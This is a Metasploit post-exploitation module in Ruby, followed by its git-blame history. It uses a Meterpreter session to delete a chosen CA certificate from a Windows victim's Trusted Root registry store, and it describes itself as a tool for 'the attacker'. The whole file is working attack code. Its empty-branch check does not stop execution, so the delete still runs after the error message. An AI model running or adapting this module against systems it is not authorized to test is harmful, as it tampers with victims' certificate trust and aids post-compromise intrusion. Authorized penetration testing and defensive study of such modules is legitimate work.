modules/post/windows/manage/remove_ca.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Certificate Authority Removal',
        'Description' => %q{
          This module allows the attacker to remove an arbitrary CA certificate
          from the victim's Trusted Root store.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_registry_open_key
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),
      ]
    )
  end

  def run
    certtoremove = datastore['CERTID']

    open_key = nil
    key = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
    rkey, bkey = client.sys.registry.splitkey(key)

    # Check if the requested cert is actually in the registry to start with
    open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)
    keys = open_key.enum_key

    if (keys.length > 1)
      if keys.include?(certtoremove)
        # We found our target
      else
        print_error('The specified CA is not in the registry.')
        return
      end
    else
      print_error('These are not the CAs you are looking for (i.e. this registry branch is empty)')
    end

    open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)
    open_key.delete_key(certtoremove)
    print_good("Successfully deleted CA: #{certtoremove}")
  end
end
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Windows Manage Certificate Authority Removal',`
			`'Description' => %q{`
			`This module allows the attacker to remove an arbitrary CA certificate`
			`from the victim's Trusted Root store.`
			`},`
			`'License' => BSD_LICENSE,`
			`'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],`
			`'Platform' => [ 'win' ],`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'SessionTypes' => [ 'meterpreter' ],`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`stdapi_registry_open_key`
			`]`
			`}`
			`}`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`)`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`register_options(`
			`[`
fixes a syntax error. 2011-10-24 22:43:27 +00:00			`OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`]`
			`)`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`def run`
			`certtoremove = datastore['CERTID']`
Retab modules 2013-08-30 16:28:54 -05:00
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`open_key = nil`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`key = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`rkey, bkey = client.sys.registry.splitkey(key)`
Retab modules 2013-08-30 16:28:54 -05:00
msftidy on post modules for spaces at EOL 2011-11-20 12:53:25 +11:00			`# Check if the requested cert is actually in the registry to start with`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)`
			`keys = open_key.enum_key`
Retab modules 2013-08-30 16:28:54 -05:00
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`if (keys.length > 1)`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`if keys.include?(certtoremove)`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`# We found our target`
			`else`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('The specified CA is not in the registry.')`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`return`
			`end`
			`else`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('These are not the CAs you are looking for (i.e. this registry branch is empty)')`
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
These are the "myca" modules by Nick Freeman. Feature #5503 2011-10-23 17:17:32 +00:00			`open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)`
			`open_key.delete_key(certtoremove)`
			`print_good("Successfully deleted CA: #{certtoremove}")`
			`end`
			`end`